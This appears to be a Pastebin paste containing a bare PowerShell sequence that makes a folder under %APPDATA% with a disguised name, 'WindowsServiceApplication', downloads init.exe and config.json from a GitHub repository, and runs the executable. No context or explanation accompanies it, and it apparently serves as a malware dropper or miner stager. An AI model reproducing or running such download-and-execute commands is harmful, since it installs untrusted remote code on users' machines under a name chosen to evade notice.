Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- New-Item -ItemType Directory -Path "$env:APPDATA\WindowsServiceApplication" -Force | Set-Location
- Invoke-WebRequest -Uri "https://raw.githubusercontent.com/ShinigamiRyuk32/Shinigami/refs/heads/main/init.exe" -OutFile "init.exe"
- Invoke-WebRequest -Uri "https://raw.githubusercontent.com/ShinigamiRyuk32/Shinigami/refs/heads/main/config.json" -OutFile "config.json"
- .\init.exe
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement